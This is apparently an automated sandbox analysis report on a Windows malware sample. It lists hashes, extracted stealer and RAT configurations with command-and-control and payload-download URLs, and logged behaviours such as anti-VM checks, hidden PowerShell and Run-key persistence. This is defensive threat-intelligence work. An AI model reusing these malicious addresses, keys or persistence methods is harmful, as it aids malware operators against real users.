Analysis
-
max time kernel
67s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
29/03/2025, 14:09
Static task
static1
Behavioral task
behavioral1
Sample
2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
fab7377d0c225be7110b381bbbe53d2e
-
SHA1
3096dd62d5f3bcfaec2350e2e7484ddf4fea17b1
-
SHA256
402dfdbcdac8266fdde22e6a8ecc3ad6fd795aaacda7620c4b6ecd615864dd88
-
SHA512
89769c0cda927e2318ebf1b6b738040f4b723d05923194a515bdf406afd47845cd0f03e3828079bbcd4a81eabc20cd1a4ebce7b756987e0e49d31ae55c2714f5
-
SSDEEP
24576:sqDEvCTbMWu7rQYlBQcBiT6rprG8a0ku:sTvC/MTQYxsWR7a0k
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
quasar
1.5.0
Office04
goku92ad.zapto.org:5000
a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a
-
encryption_key
BF72099FDBC6B48816529089CF1CF2CF86357D14
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Modded Client Startup
-
subdirectory
SubDir
Extracted
lumma
https://cosmosyf.top/GOsznj
https://byteplusx.digital/aXweAX
https://travewlio.shop/ZNxbHi
https://skynetxc.live/AksoPA
https://pixtreev.run/LkaUz
https://advennture.top/GKsiio
https://targett.top/dsANGt
https://sparkiob.digital/KeASUp
https://appgridn.live/LEjdAK
https://wxayfarer.live/ALosnz
https://70oreheatq.live/gsopp
https://0castmaxw.run/ganzde
https://weldorae.digital/geds
https://steelixr.live/aguiz
https://smeltingt.run/giiaus
https://ferromny.digital/gwpd
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/9040-29534-0x00000000002E0000-0x0000000000716000-memory.dmp healer behavioral2/memory/9040-29533-0x00000000002E0000-0x0000000000716000-memory.dmp healer behavioral2/memory/9040-29974-0x00000000002E0000-0x0000000000716000-memory.dmp healer -
Healer family
-
Lumma family
-
Quasar family
-
Quasar payload 2 IoCs
resource yara_rule behavioral2/memory/1512-129-0x000000000CF10000-0x000000000D064000-memory.dmp family_quasar behavioral2/memory/1512-130-0x000000000D090000-0x000000000D0AA000-memory.dmp family_quasar -
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ce59d98f05.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5796d75ec2.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempQCAHOJQJQYNNUIN2TPH85FFPA55XHC74.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe -
Blocklisted process makes network request 4 IoCs
flow pid Process 14 3500 powershell.exe 35 1512 powershell.exe 37 1512 powershell.exe 41 1512 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
pid Process 3500 powershell.exe 1512 powershell.exe 5448 powershell.exe 1204 powershell.exe 464 powershell.exe 4500 powershell.exe 4880 powershell.exe -
Downloads MZ/PE file 10 IoCs
flow pid Process 45 4884 svchost.exe 72 184 rapes.exe 72 184 rapes.exe 72 184 rapes.exe 72 184 rapes.exe 72 184 rapes.exe 72 184 rapes.exe 14 3500 powershell.exe 39 184 rapes.exe 46 184 rapes.exe -
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ce59d98f05.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5796d75ec2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5796d75ec2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempQCAHOJQJQYNNUIN2TPH85FFPA55XHC74.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempQCAHOJQJQYNNUIN2TPH85FFPA55XHC74.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ce59d98f05.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation TempQCAHOJQJQYNNUIN2TPH85FFPA55XHC74.EXE Key value queried \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation rapes.exe -
Deletes itself 1 IoCs
pid Process 948 w32tm.exe -
Drops startup file 4 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_64d01e76.cmd powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_64d01e76.cmd powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f959e97a.cmd powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f959e97a.cmd powershell.exe -
Executes dropped EXE 47 IoCs
pid Process 3080 TempQCAHOJQJQYNNUIN2TPH85FFPA55XHC74.EXE 184 rapes.exe 1776 u75a1_003.exe 5556 ae9ccc196b.exe 2556 rapes.exe 3888 tzutil.exe 948 w32tm.exe 12764 8fe1ZIHI3C10.exe 12912 8fe1ZIHI3C10.exe 13032 8fe1ZIHI3C10.exe 13116 8fe1ZIHI3C10.exe 13240 8fe1ZIHI3C10.exe 6208 8fe1ZIHI3C10.exe 6340 8fe1ZIHI3C10.exe 6524 8fe1ZIHI3C10.exe 6628 8fe1ZIHI3C10.exe 6760 8fe1ZIHI3C10.exe 7040 8fe1ZIHI3C10.exe 3372 8fe1ZIHI3C10.exe 7268 8fe1ZIHI3C10.exe 7628 8fe1ZIHI3C10.exe 7612 ce59d98f05.exe 6104 8fe1ZIHI3C10.exe 8204 8fe1ZIHI3C10.exe 8484 8fe1ZIHI3C10.exe 8860 8fe1ZIHI3C10.exe 9072 8fe1ZIHI3C10.exe 9228 8fe1ZIHI3C10.exe 9428 8fe1ZIHI3C10.exe 9608 8fe1ZIHI3C10.exe 9808 5796d75ec2.exe 10220 8fe1ZIHI3C10.exe 10444 8fe1ZIHI3C10.exe 10620 8fe1ZIHI3C10.exe 10792 8fe1ZIHI3C10.exe 10988 8fe1ZIHI3C10.exe 11164 8fe1ZIHI3C10.exe 11284 8fe1ZIHI3C10.exe 11488 8fe1ZIHI3C10.exe 11704 8fe1ZIHI3C10.exe 11896 8fe1ZIHI3C10.exe 12088 751a73f7f3.exe 12276 8fe1ZIHI3C10.exe 4916 8fe1ZIHI3C10.exe 12396 8fe1ZIHI3C10.exe 6236 8fe1ZIHI3C10.exe 5784 8fe1ZIHI3C10.exe -
Identifies Wine through registry keys 2 TTPs 5 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine TempQCAHOJQJQYNNUIN2TPH85FFPA55XHC74.EXE Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine ce59d98f05.exe Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine 5796d75ec2.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Adds Run key to start application 2 TTPs 41 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemMonitorUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8fe1ZIHI3C10.exe" 8fe1ZIHI3C10.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemMonitorUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8fe1ZIHI3C10.exe" 8fe1ZIHI3C10.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5796d75ec2.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10369680101\\5796d75ec2.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemMonitorUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8fe1ZIHI3C10.exe" 8fe1ZIHI3C10.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemMonitorUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8fe1ZIHI3C10.exe" 8fe1ZIHI3C10.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemMonitorUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8fe1ZIHI3C10.exe" 8fe1ZIHI3C10.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemMonitorUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8fe1ZIHI3C10.exe" 8fe1ZIHI3C10.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemMonitorUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8fe1ZIHI3C10.exe" 8fe1ZIHI3C10.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemMonitorUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8fe1ZIHI3C10.exe" 8fe1ZIHI3C10.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\751a73f7f3.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10369690101\\751a73f7f3.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemMonitorUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8fe1ZIHI3C10.exe" 8fe1ZIHI3C10.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemMonitorUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8fe1ZIHI3C10.exe" 8fe1ZIHI3C10.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemMonitorUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8fe1ZIHI3C10.exe" 8fe1ZIHI3C10.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemMonitorUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8fe1ZIHI3C10.exe" 8fe1ZIHI3C10.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemMonitorUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8fe1ZIHI3C10.exe" 8fe1ZIHI3C10.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemMonitorUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8fe1ZIHI3C10.exe" 8fe1ZIHI3C10.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ce59d98f05.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10369670101\\ce59d98f05.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemMonitorUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8fe1ZIHI3C10.exe" 8fe1ZIHI3C10.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemMonitorUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8fe1ZIHI3C10.exe" 8fe1ZIHI3C10.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemMonitorUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8fe1ZIHI3C10.exe" 8fe1ZIHI3C10.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemMonitorUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8fe1ZIHI3C10.exe" 8fe1ZIHI3C10.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemMonitorUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8fe1ZIHI3C10.exe" 8fe1ZIHI3C10.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemMonitorUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8fe1ZIHI3C10.exe" 8fe1ZIHI3C10.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemMonitorUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8fe1ZIHI3C10.exe" 8fe1ZIHI3C10.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemMonitorUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8fe1ZIHI3C10.exe" 8fe1ZIHI3C10.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemMonitorUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8fe1ZIHI3C10.exe" 8fe1ZIHI3C10.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemMonitorUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8fe1ZIHI3C10.exe" 8fe1ZIHI3C10.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemMonitorUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8fe1ZIHI3C10.exe" 8fe1ZIHI3C10.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemMonitorUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8fe1ZIHI3C10.exe" 8fe1ZIHI3C10.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemMonitorUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8fe1ZIHI3C10.exe" 8fe1ZIHI3C10.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemMonitorUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8fe1ZIHI3C10.exe" 8fe1ZIHI3C10.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemMonitorUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8fe1ZIHI3C10.exe" 8fe1ZIHI3C10.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemMonitorUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8fe1ZIHI3C10.exe" 8fe1ZIHI3C10.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemMonitorUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8fe1ZIHI3C10.exe" 8fe1ZIHI3C10.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemMonitorUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8fe1ZIHI3C10.exe" 8fe1ZIHI3C10.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemMonitorUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8fe1ZIHI3C10.exe" 8fe1ZIHI3C10.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemMonitorUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8fe1ZIHI3C10.exe" 8fe1ZIHI3C10.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemMonitorUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8fe1ZIHI3C10.exe" 8fe1ZIHI3C10.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemMonitorUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8fe1ZIHI3C10.exe" 8fe1ZIHI3C10.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000300000001dba1-29501.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid Process 3080 TempQCAHOJQJQYNNUIN2TPH85FFPA55XHC74.EXE 184 rapes.exe 2556 rapes.exe 7612 ce59d98f05.exe 9808 5796d75ec2.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 5556 set thread context of 5784 5556 ae9ccc196b.exe 130 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job TempQCAHOJQJQYNNUIN2TPH85FFPA55XHC74.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ce59d98f05.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8fe1ZIHI3C10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8fe1ZIHI3C10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8fe1ZIHI3C10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8fe1ZIHI3C10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8fe1ZIHI3C10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8fe1ZIHI3C10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8fe1ZIHI3C10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8fe1ZIHI3C10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8fe1ZIHI3C10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language u75a1_003.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8fe1ZIHI3C10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8fe1ZIHI3C10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8fe1ZIHI3C10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8fe1ZIHI3C10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8fe1ZIHI3C10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5796d75ec2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8fe1ZIHI3C10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8fe1ZIHI3C10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8fe1ZIHI3C10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8fe1ZIHI3C10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8fe1ZIHI3C10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 751a73f7f3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8fe1ZIHI3C10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8fe1ZIHI3C10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8fe1ZIHI3C10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8fe1ZIHI3C10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8fe1ZIHI3C10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8fe1ZIHI3C10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8fe1ZIHI3C10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8fe1ZIHI3C10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8fe1ZIHI3C10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8fe1ZIHI3C10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8fe1ZIHI3C10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8fe1ZIHI3C10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 751a73f7f3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 751a73f7f3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempQCAHOJQJQYNNUIN2TPH85FFPA55XHC74.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8fe1ZIHI3C10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8fe1ZIHI3C10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8fe1ZIHI3C10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8fe1ZIHI3C10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8fe1ZIHI3C10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Kills process with taskkill 5 IoCs
pid Process 4924 taskkill.exe 4128 taskkill.exe 12552 taskkill.exe 228 taskkill.exe 7692 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000_Classes\Local Settings rapes.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2028 schtasks.exe -
